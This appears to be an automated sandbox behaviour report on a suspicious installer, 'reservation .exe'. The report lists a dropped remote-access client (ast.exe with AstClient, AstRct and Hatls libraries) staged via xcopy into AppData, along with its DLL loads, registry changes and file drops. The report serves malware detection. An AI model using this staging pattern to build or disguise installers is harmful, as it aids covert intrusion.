Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: logoncli.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: colorui.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: mscms.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: coloradapterclient.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: compstui.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: inetres.dll
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Section loaded: msimg32.dll
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: security.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dbgcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: d3d11.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: astcrp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: libssl-1_1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: libcrypto-1_1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: libcrypto-1_1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dataexchange.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dcomp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: olepro32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sqlite3.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: crtdll.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: quartz.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: avifil32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: colorui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mscms.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: coloradapterclient.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: compstui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: inetres.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: security.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: olepro32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sqlite3.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: crtdll.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: quartz.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: avifil32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: colorui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: mscms.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: coloradapterclient.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: compstui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: inetres.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: security.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeFile written: C:\Users\user\AppData\Roaming\fat\config.iniJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpWindow found: window name: TMainFormJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: reservation .exeStatic file information: File size 7988632 > 1048576
                          Source: reservation .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: vcruntime140.i386.pdb source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000002.2726589967.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337890732.000000006E0D1000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: vcruntime140.i386.pdbGCTL source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000002.2726589967.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337890732.000000006E0D1000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2456715536.00000000030E6000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3329265043.000000006BC70000.00000002.00000001.01000000.00000014.sdmp, is-RFQHO.tmp.4.dr
                          Source: Binary string: vcomp140.i386.pdbGCTL source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\CFILES\Projects\WinSSL\openssl-1.1.0g\libcrypto-1_1.pdb source: xcopy.exe, 00000008.00000003.2457697380.000000000310F000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdbe source: xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337086726.000000006C923000.00000002.00000001.01000000.0000000F.sdmp, is-8MMT6.tmp.4.dr
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\libeay32.pdb source: xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb@W source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdb source: xcopy.exe, 00000008.00000003.2455429869.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3331797852.000000006C0DF000.00000002.00000001.01000000.00000011.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdb source: xcopy.exe, 00000008.00000003.2455975979.0000000003106000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3334659818.000000006C392000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb@@ source: xcopy.exe, 00000008.00000003.2459594021.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3336200986.000000006C701000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: vcomp140.i386.pdb source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdbf source: xcopy.exe, 00000008.00000003.2455975979.0000000003106000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3334659818.000000006C392000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb source: xcopy.exe, 00000008.00000003.2459594021.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3336200986.000000006C701000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: ast.exe, 0000000A.00000002.3329265043.000000006BC07000.00000002.00000001.01000000.00000014.sdmp, is-RFQHO.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdb source: xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337086726.000000006C923000.00000002.00000001.01000000.0000000F.sdmp, is-8MMT6.tmp.4.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdbM6 source: xcopy.exe, 00000008.00000003.2455429869.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3331797852.000000006C0DF000.00000002.00000001.01000000.00000011.sdmp
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Tue Sep 7 07:24:19 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not availabledes(long) source: ast.exe, 0000000A.00000002.3329265043.000000006BC07000.00000002.00000001.01000000.00000014.sdmp, is-RFQHO.tmp.4.dr
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B6FAE50 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,_strpbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,if_nametoindex,QueryPerformanceFrequency,10_2_6B6FAE50
Source: reservation .exe | Static PE information: section name: .didata
Source: reservation .tmp.0.dr | Static PE information: section name: .didata
Source: reservation .tmp.3.dr | Static PE information: section name: .didata
Source: is-MGO66.tmp.4.dr | Static PE information: section name: .rodata
Source: is-BI7PN.tmp.4.dr | Static PE information: section name: .textbss
Source: is-BI7PN.tmp.4.dr | Static PE information: section name: .msvcjmc
Source: is-BI7PN.tmp.4.dr | Static PE information: section name: .00cfg
Source: is-RFQHO.tmp.4.dr | Static PE information: section name: .00cfg
Source: is-SJ8AI.tmp.4.dr | Static PE information: section name: .00cfg
Source: is-PO10S.tmp.4.dr | Static PE information: section name: .code
Source: quartz.dll.8.dr | Static PE information: section name: .code
Source: astrct.dll.8.dr | Static PE information: section name: .rodata
Source: hatls.dll.8.dr | Static PE information: section name: .textbss
Source: hatls.dll.8.dr | Static PE information: section name: .msvcjmc
Source: hatls.dll.8.dr | Static PE information: section name: .00cfg
Source: libcrypto-1_1.dll.8.dr | Static PE information: section name: .00cfg
Source: libssl-1_1.dll.8.dr | Static PE information: section name: .00cfg
Source: C:\Users\user\AppData\Roaming\fat\ast.exe | Code function: 10_2_6B729F78 push ecx; ret 10_2_6B729F76
Source: is-PDQGE.tmp.4.dr | Static PE information: section name: .text entropy: 6.95576372950548
Source: msvcr120.dll.8.dr | Static PE information: section name: .text entropy: 6.95576372950548
Source: C:\Users\user\Desktop\reservation .exe | File created: \reservation .exe
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | File created: \reservation .tmp
Source: C:\Users\user\Desktop\reservation .exe | File created: \reservation .exe
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: \reservation .tmp
Source: C:\Users\user\Desktop\reservation .exe | File created: \reservation .exe
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | File created: \reservation .tmp
Source: C:\Users\user\Desktop\reservation .exe | File created: \reservation .exe
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: \reservation .tmp
Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_iscrypt.dll
Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\fat\opus.dll
Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\fat\astrct.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\qilq\libcrypto-1_1.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\qilq\libjpeg-turbo-win.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\qilq\quartz.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\qilq\is-PDQGE.tmp
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\qilq\is-8MMT6.tmp
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\qilq\is-SJ8AI.tmp
Source: C:\Users\user\Desktop\reservation .exe | File created: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp
Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\fat\AstCrp.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_setup64.tmp
Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\fat\astclient.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\qilq\AstCrp.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\qilq\is-BI7PN.tmp
Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\fat\libcryptoMD.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\qilq\libcurl.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\qilq\is-HE32K.tmp
Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\fat\aw_sas32.dll
Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp | File created: C:\Users\user\AppData\Local\Temp\qilq\libcryptoMD.dll (copy)
Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Roaming\fat\hatls.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\is-K402A.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpFile created: C:\Users\user\AppData\Local\Temp\qilq\hatls.dll (copy)Jump to dropped file
